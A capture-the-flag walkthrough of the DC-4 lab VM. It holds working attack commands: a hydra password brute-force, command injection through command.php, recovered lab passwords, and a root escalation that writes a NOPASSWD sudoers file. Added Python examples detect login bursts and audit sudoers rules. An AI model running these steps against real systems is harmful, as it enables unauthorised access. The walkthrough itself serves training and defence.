DC919 CTF exercise night using "DC-4" prebuilt VM image
SPOILER ALERT: This document is intended to be a walk-through, so if you want to do this CTF challenge honestly, close this page now.
The following is the result of a group effort during a CTF conf call. There were a bunch of people present on the call, and if they ask me to I'll happily list them here. We share lots of tricks during these calls, everyone contributes and we all come out of it smarter.
In this case the VMs have the following IPs:
nmap -A -sS -p- 192.168.57.7
nmap scan shows:
http://192.168.57.7/ in a browser shows a simple web form: username / password / submit.
gobuster with /usr/share/dirb/wordlists/common.txt shows very little: /css/ and /images/
Someone else found command.php (from a different wordlist? not sure), which offers a few options.
sqlmap can't find a valid injection point, so the fallback is guessing a username and brute-forcing the password:
hydra -v -l admin -P /usr/share/wordlists/rockyou.txt 192.168.57.7 http-form-post "/login.php:username=^USER^&password=^PASS^&submit=Submit:S=command.php"
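From the other side of the wire, a run like the one above leaves a very recognisable trail in the web server's access log: one client, many POSTs to /login.php in a short window, each answered with the form again, then a single redirect to command.php for the guess that worked (that redirect is exactly what the hydra invocation keys on with S=command.php). The following is an added detection example, not part of the original writeup or the DC-4 image: it parses Apache combined-format lines, counts POSTs to the login path per client inside a sliding window, and reports clients over a threshold together with whether their burst ended in a redirect. The log lines, IPs, timestamps, threshold and window are all constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Apache/nginx combined log format, reduced to the fields the check needs:
# client IP, timestamp, method, request path and response status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return (ip, datetime, method, path, status), or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return (m["ip"], datetime.strptime(m["ts"], TS_FMT), m["method"], m["path"], int(m["status"]))


def find_login_bursts(lines, path="/login.php", window=timedelta(seconds=60), threshold=20):
    """Flag clients that POST to `path` more than `threshold` times inside any `window`.

    Returns {ip: {"max_in_window": n, "total": n, "followed_by_redirect": bool}}.
    `followed_by_redirect` is True when at least one of the client's login POSTs got a
    3xx answer, i.e. one guess was accepted and sent on to the post-login page.
    """
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec[2] == "POST" and rec[3] == path:
            per_ip[rec[0]].append((rec[1], rec[4]))

    flagged = {}
    for ip, events in per_ip.items():
        events.sort()
        times = [t for t, _ in events]
        best, start = 0, 0
        # Two-pointer sliding window over the sorted timestamps.
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best > threshold:
            flagged[ip] = {
                "max_in_window": best,
                "total": len(events),
                "followed_by_redirect": any(300 <= status < 400 for _, status in events),
            }
    return flagged


def make_sample_log():
    """Constructed sample data (not captured traffic): 30 POSTs one second apart from one
    client, the last answered 302, plus a normal user logging in twice three hours apart."""
    lines = []
    t0 = datetime(2023, 10, 10, 13, 55, 0, tzinfo=timezone.utc)
    for i in range(30):
        status = 302 if i == 29 else 200
        ts = (t0 + timedelta(seconds=i)).strftime(TS_FMT)
        lines.append(f'192.168.57.100 - - [{ts}] "POST /login.php HTTP/1.1" {status} 512 "-" "curl/7.88"')
    for hours in (0, 3):
        ts = (t0 + timedelta(hours=hours)).strftime(TS_FMT)
        lines.append(f'192.168.57.50 - - [{ts}] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"')
    lines.append('192.168.57.50 - - [10/Oct/2023:13:55:05 +0000] "GET /css/style.css HTTP/1.1" 200 1200 "-" "Mozilla/5.0"')
    return lines


if __name__ == "__main__":
    for ip, info in find_login_bursts(make_sample_log()).items():
        print(ip, info)
```

On a real host you would feed `find_login_bursts` the lines of the access log instead of `make_sample_log()`; the threshold should sit well above what a human produces in a minute, and a burst that ends in a redirect is the case to page on, since it means the guessing stopped because it worked.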
With those credentials and Firefox's web tools (copy as cURL), command.php can be used for arbitrary command execution by replacing the value of the radio parameter: radio=arbitrarycommand
Found /home/jim/backups/old-passwords.bak
Found password: jim/jibril04
/home/jim/mbox is a hint that jim reads mail on this box, and /var/mail/jim contains a password. Found password: charles/xHhA&hvim0y
charles is able to run "sudo /usr/bin/teehee"
Easy pivot (teehee writes its stdin to the named file as root, so it can drop a sudoers fragment):
echo "charles ALL = NOPASSWD: ALL" >nopasswd.txt
sudo /usr/bin/teehee /etc/sudoers.d/charles <nopasswd.txt
sudo -i
cat /root/flag.txt
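The lesson from the last step is that a sudo rule for a single binary is only as narrow as that binary: anything that writes an arbitrary file as root (tee under any name, cp, editors) is a root grant in disguise, and a NOPASSWD tag makes it usable from any shell the account ever gets. The following is an added audit example, not part of the original writeup: it parses sudoers-style rules, flags unrestricted and NOPASSWD grants, and catches renamed copies of file-writing tools by hashing the granted binary against a baseline of known tool hashes. The sudoers text, the binary contents, the hash baseline and the tool list are constructed for the example; on a real host the baseline would come from package-manager hashes or a known-good image.

```python
import hashlib
import re
from pathlib import Path

# Tools that can write any file or spawn a shell when run as root. Constructed list for
# the example; a real baseline would be longer and maintained with the system's packages.
FILE_WRITE_TOOLS = {"tee", "cp", "mv", "dd", "vim", "vi", "nano", "sh", "bash"}

# user_or_%group  host = (runas) TAG: cmd1, cmd2   (Defaults and comments are skipped)
RULE_RE = re.compile(
    r'^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*'
    r'(?:\((?P<runas>[^)]*)\)\s*)?'
    r'(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$'
)


def parse_rules(text):
    """Parse sudoers text into a list of {who, host, tags, cmds} dicts."""
    rules = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t.strip() for t in m["tags"].split(":") if t.strip()}
        cmds = [c.strip() for c in m["cmds"].split(",")]
        rules.append({"who": m["who"], "host": m["host"], "tags": tags, "cmds": cmds})
    return rules


def audit(rules, binaries, known_hashes):
    """Return (who, cmd, reason) findings.

    `binaries` maps an executable path to its bytes; `known_hashes` maps a sha256 hex
    digest to the tool name it belongs to, so a copy of tee installed under another
    name is recognised by content rather than by filename.
    """
    findings = []
    for r in rules:
        for cmd in r["cmds"]:
            exe = cmd.split()[0]
            name = exe.rsplit("/", 1)[-1]
            if cmd == "ALL":
                findings.append((r["who"], cmd, "unrestricted root"))
            elif name in FILE_WRITE_TOOLS:
                findings.append((r["who"], cmd, f"{name} can write any file as root"))
            elif exe in binaries:
                real = known_hashes.get(hashlib.sha256(binaries[exe]).hexdigest())
                if real in FILE_WRITE_TOOLS:
                    findings.append((r["who"], cmd, f"{exe} is a renamed copy of {real}"))
            if "NOPASSWD" in r["tags"]:
                findings.append((r["who"], cmd, "no password required"))
    return findings


def load_binaries(paths):
    """Read the granted executables from disk for a real audit (not used by the sample run)."""
    return {p: Path(p).read_bytes() for p in paths if Path(p).is_file()}


# Constructed sample inputs for the example.
SAMPLE_SUDOERS = """\
# constructed sudoers for the audit example
Defaults env_reset
root    ALL=(ALL:ALL) ALL
charles ALL = /usr/bin/teehee
jim     ALL=(ALL) NOPASSWD: /usr/bin/systemctl restart apache2
%admin  ALL=(ALL) ALL
"""
TEE_BYTES = b"constructed stand-in for the bytes of /usr/bin/tee"
SAMPLE_BINARIES = {
    "/usr/bin/tee": TEE_BYTES,
    "/usr/bin/teehee": TEE_BYTES,  # same content, different name
    "/usr/bin/systemctl": b"constructed stand-in for systemctl",
}
KNOWN_HASHES = {hashlib.sha256(TEE_BYTES).hexdigest(): "tee"}


def run_sample_audit():
    return audit(parse_rules(SAMPLE_SUDOERS), SAMPLE_BINARIES, KNOWN_HASHES)


if __name__ == "__main__":
    for who, cmd, reason in run_sample_audit():
        print(f"{who:8} {cmd:45} {reason}")
```

The same check belongs in a periodic job over /etc/sudoers and /etc/sudoers.d/: a new drop-in file granting NOPASSWD: ALL, like the one written above, is exactly the kind of change it should surface.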